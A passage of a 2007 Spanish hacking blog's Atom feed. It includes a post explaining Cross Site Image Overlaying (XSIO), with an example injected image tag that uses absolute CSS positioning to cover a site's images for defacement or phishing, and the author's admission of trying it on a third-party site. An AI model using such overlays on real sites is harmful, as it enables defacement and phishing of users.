encontrar algun fallo lo muestro aqui, despues de haber avisado a los encargados del proyecto que al ser open source no tardaran en arreglarlo seguro porque suelen funcionar rapidamente.&lt;br /&gt;&lt;br /&gt;Pagina web del proyecto: http://gallery.menalto.com/&lt;br /&gt;&lt;br /&gt;------------------------------------------------&lt;br /&gt;En espera por problemas de hosting&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-3158541251219274224?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/3158541251219274224/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=3158541251219274224' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3158541251219274224'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/3158541251219274224'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/09/buscando-bugs-en-gallery-2.html' title='Buscando Bugs en Gallery 2(en espera)'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-4298014136844933722</id><published>2007-09-19T00:07:00.000+02:00</published><updated>2007-09-22T16:38:31.349+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Ezine Yashira'/><title type='text'>Editando Ezine para Yashira.org</title><content type='html'>Bueno en estos momentos me encuentro editanto una revista electronica para la web &lt;a href="http://www.yashira.org/"&gt;Yashira.org&lt;/a&gt; y que esta en plena fase de desarrollo, asi que quien quiera puede escribir un articulo para ella, eso si se piden sobretodo que sean novedosos o de los que se haya hablado poco, y que tengan buen nivel ya que espero que no sea una mas de las muchas que hay, y bueno cualquier pregunta ya sabeis.&lt;br /&gt;&lt;br /&gt;Espero que salga pronto y os gusten los articulos, ale sigo editando y maquetando.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-4298014136844933722?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/4298014136844933722/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=4298014136844933722' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4298014136844933722'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4298014136844933722'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/09/editando-ezine-para-yashiraorg.html' title='Editando Ezine para Yashira.org'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-4323188395914456468</id><published>2007-09-16T19:00:00.000+02:00</published><updated>2007-10-16T23:00:36.442+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerabilidades WEB'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Ataque  XSIO</title><content type='html'>Hay una "nueva" o conocida, pero en la que no se ha hablado antes, vulnerabilidad llamada "XSIO" o lo que es lo mismo Cross Site Image Overlaying que se produce a causa del atributo style, nos permite un nuevo modo de hacer defaces..que se van a reir de ti como los hagas con estas cosas... o phising mediante links en imagenes, hay algunos sitios en los que para ir a algun lado hay que apretar en la imagen...¿que pasaria si en vez de la imagen esa vieramos una nuestra con nuestra sitio para hacer phising?Pues sencillo se podrian sacar datos como hacen actualmente y hacer que el usuario vea lo mismo cuando no lo es.&lt;br /&gt;&lt;br /&gt;Le veo el problema a la vulnerabilidad de que en muchos sitios no va a funcionar ya que necesita para funcionar o HTML habilitado en algun lugar...pocos lo hacen, o mediante CSS que o eres admin, o en algunos blog esta esa posibilidad pero seguramente no funcione en muchos sitios aun asi en este funciona jejej, la cosa es que si pones para que vaya a una web...tendria que tener un sitio donde redireccione paginas web, ya que sino quedaria algo asi: http://trancek.blogspot.com/http://yashira.org y daria un error .&lt;br /&gt;Lo probe en algunos sitios y algunos ya traen proteccion por si intentas hacer algo asi aun si puede ver e intentar hacer cosas malignas, es solo tener imaginacion.&lt;br /&gt;&lt;br /&gt;Ejemplo:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_L9yjBo3h8BM/Ru1wDjbCoMI/AAAAAAAAAAM/zHDVvjLF_Jc/s1600-h/1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://4.bp.blogspot.com/_L9yjBo3h8BM/Ru1wDjbCoMI/AAAAAAAAAAM/zHDVvjLF_Jc/s400/1.jpg" alt="" id="BLOGGER_PHOTO_ID_5110864358485958850" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Al hacer un post por ejemplo con el codigo:&lt;br /&gt;&lt;br /&gt;{img src=http://img514.imageshack.us/img514/163/dibujobi1.jpg style=position:absolute;right:350px;top:90px;/}&lt;br /&gt;&lt;br /&gt;{} es lo mismo que &lt;&gt; es que esto tmb es vulnerable...jejeje&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://trancek.4444mb.com/1.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://trancek.4444mb.com/1.jpg" alt="" border="0" /&gt;&lt;/a&gt;Solo lo probe ahi, una web que me encontre por ahi, y nada mas probarlo lo borre soy buena gente.&lt;br /&gt;Asi que los que lean esto lo prueben con sus webs por si acaso y no hagais muchas maldades, con conocimientos del html se te ocurriran mas cosas que hacer.&lt;br /&gt;&lt;br /&gt;Articulo: &lt;a href="http://www.disenchant.ch/blog/wp-content/uploads/2007/09/xsio.pdf"&gt;XSIO&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-4323188395914456468?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/4323188395914456468/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=4323188395914456468' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4323188395914456468'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/4323188395914456468'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/09/ataque-xsio.html' title='Ataque  XSIO'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_L9yjBo3h8BM/Ru1wDjbCoMI/AAAAAAAAAAM/zHDVvjLF_Jc/s72-c/1.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1892387077578445097.post-2928672920933905669</id><published>2007-09-16T16:10:00.001+02:00</published><updated>2007-09-22T16:36:08.942+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Diario'/><category scheme='http://www.blogger.com/atom/ns#' term='Humor Malo'/><title type='text'>Uno mas que se une a los blog</title><content type='html'>Aqui va mi diario ejejeje, para que vean que siempre esta bien decir unas cuantas paridas al dia y poco mas.&lt;br /&gt;&lt;br /&gt;2001&lt;br /&gt;Creo que por esa epoca empece a ver eso de internet.&lt;br /&gt;2002&lt;br /&gt;Me empiezo a interesar por la Ing Inversa pero como soy un niño no me entero de nada y lo dejo.&lt;br /&gt;2003-2004&lt;br /&gt;Soy un chico interesado en los llamados wargames y en el hacking, todavia me quedaba mu lejos todo, me leo de todo y sobretodo ezines como Disidents.&lt;br /&gt;2005-2006&lt;br /&gt;Me vicio a una web llamada hackyashira.com actualmente llamada yashira.org&lt;br /&gt;2007&lt;br /&gt;Aqui me llego una epoca en la que aprendo mas cosas y voy viendo como manejarme en esto.&lt;br /&gt;2008&lt;br /&gt;Soy millonario e invito a todo el mundo a cocteles, me hice rico ayudando gratis, por lo tanto los cocteles con bebidas de marcas baratas, sorry&lt;br /&gt;2012&lt;br /&gt;Se acabo el mundo, estoy escribiendo desde dios sabe donde.&lt;br /&gt;2013-20xx&lt;br /&gt;Me internan en el psiquiatrico y lo demas ya lo sabeis.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quien haya leido esto no tiene derecho a dcir que estoy loco, mas que nada porque el loco seria el que lo lee no el que lo escribe, ya que a partir de cierto lugar deberia de haber dejado de leer xD&lt;br /&gt;&lt;br /&gt;Saludos&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1892387077578445097-2928672920933905669?l=www.trancek.es' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.trancek.es/feeds/2928672920933905669/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1892387077578445097&amp;postID=2928672920933905669' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2928672920933905669'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1892387077578445097/posts/default/2928672920933905669'/><link rel='alternate' type='text/html' href='http://www.trancek.es/2007/09/uno-mas-que-se-une-los-blog.html' title='Uno mas que se une a los blog'/><author><name>Trancek</name><uri>http://www.blogger.com/profile/02206831101238505779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry></feed>
